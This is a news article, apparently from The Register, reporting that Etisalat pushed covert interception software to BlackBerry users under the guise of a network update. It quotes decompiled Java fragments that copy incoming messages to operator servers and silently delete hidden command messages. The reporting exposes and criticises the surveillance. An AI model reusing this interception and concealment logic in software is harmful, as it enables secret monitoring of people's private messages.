Feeds

BlackBerry snoopers can explain everything

Etisalat downloads smoke and mirrors

Website security in corporate America

Etisalat, the United Arab Emirates operator who recently pushed snooping software to its BlackBerry-using customers, has explained that it's all in the interests of network compatibility.

But its claim that appear fall down at the slightest scrutiny - or at least with a glance at the code in question.

The patch, which was sent out earlier this week, includes a file called Registration.jar, which appears to emanate from snooping-software specialist SS8. Registration.jar includes Java code clearly intended to intercept and make copies of received e-mail and text messages, despite assurances from Etisalat that the package is "required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas".

Users first noticed suspicious activity when their BlackBerrys started experiencing heavy battery drain, which Etisalat attributes to "a slight technical fault while upgrading the software of these devices". Security researchers claim it's actually down to the snooping software repeatedly trying to register with a central server. The statement from Etisalat also claims that users experiencing problems - the operator admits to receiving 300 complaints - can dial 101 to have the upgrade reversed.

That may well be true: the software Etisalat is distributing isn't supposed to be reporting on every user. It is designed to be remotely triggered on specific handsets, before commencing its task of copying off that customer's messages to servers within the network operator.

The Register has been taking a look at Registration.jar, suitably decompiled, and Java developers might be interested in this snippet:

public void messagesAdded(FolderEvent fevent)
  {
  sentmsg++;
  if(fevent.getType() == 1)
  {
    Message msg = fevent.getMessage();
    try
    {
    String subject = msg.getSubject();
    if(subject != null && (subject.indexOf("I: response") != -1 || subject.indexOf("I:FW:") != -1))
     return;
    }
    catch(Exception e) { }
    MsgOut msgout = new MsgOut(log, this, msg, true);
    msgout.start();
    } else
      if(fevent.getType() != 2);
    }

...which is clearly related to roaming between 2G and 3G networks. Or this section, which (at a glance) would appear to be code devoted to removing received instructions (originating from "Customer Services") before the user gets a chance to see them:

if (fpin != null && fnam != null
&& fpin.equalsIgnoreCase("Customer Service")
  && fnam.equalsIgnoreCase("Customer Service")
  && cmds.msgIsPIN(msg)) {
  String body = msg.getBodyText();
  try {
    msg.getFolder().deleteMessage(msg, true);
  } catch (Exception exception) {
    /* empty */
  }

...but that can't be true, so it's obviously about enhancing network coverage.

Remotely installing spyware on users' handsets is one thing, but we would expect the snoops to at least obfuscate their code, not to mention that Registration.jar includes a complete SMTP client: ideal for avoiding any interaction with the RIM servers over in Canada.

Etisalat reckons they have 145,000 BlackBerry users, which means that 105,000 of them (who didn't complain) may have got this snooping software installed and running, ready to receive that coded command to start intercepting messages when someone decides they're worth watching. ®

Internet Security Threat Report 2014

More from The Register

next story
Brit telcos warn Scots that voting Yes could lead to HEFTY bills
BT and Co: Independence vote likely to mean 'increased costs'
Phones 4u slips into administration after EE cuts ties with Brit mobe retailer
More than 5,500 jobs could be axed if rescue mission fails
ISPs' post-net-neutrality world is built on 'bribes' says Tim Berners-Lee
Father of the worldwide web is extremely peeved over pay-per-packet-type plans
New 'Cosmos' browser surfs the net by TXT alone
No data plan? No WiFi? No worries ... except sluggish download speed
Radio hams can encrypt, in emergencies, says Ofcom
Consultation promises new spectrum and hints at relaxed licence conditions
Google+ GOING, GOING ... ? Newbie Gmailers no longer forced into mandatory ID slurp
Mountain View distances itself from lame 'network thingy'
Blockbuster book lays out the first 20 years of the Smartphone Wars
Symbian's David Wood bares all. Not for the faint hearted
Bonking with Apple has POUNDED mobe operators' wallets
... into submission. Weve squeals, ditches payment plans
prev story

Whitepapers

Secure remote control for conventional and virtual desktops
Balancing user privacy and privileged access, in accordance with compliance frameworks and legislation. Evaluating any potential remote control choice.
WIN a very cool portable ZX Spectrum
Win a one-off portable Spectrum built by legendary hardware hacker Ben Heck
Storage capacity and performance optimization at Mizuno USA
Mizuno USA turn to Tegile storage technology to solve both their SAN and backup issues.
High Performance for All
While HPC is not new, it has traditionally been seen as a specialist area – is it now geared up to meet more mainstream requirements?
The next step in data security
With recent increased privacy concerns and computers becoming more powerful, the chance of hackers being able to crack smaller-sized RSA keys increases.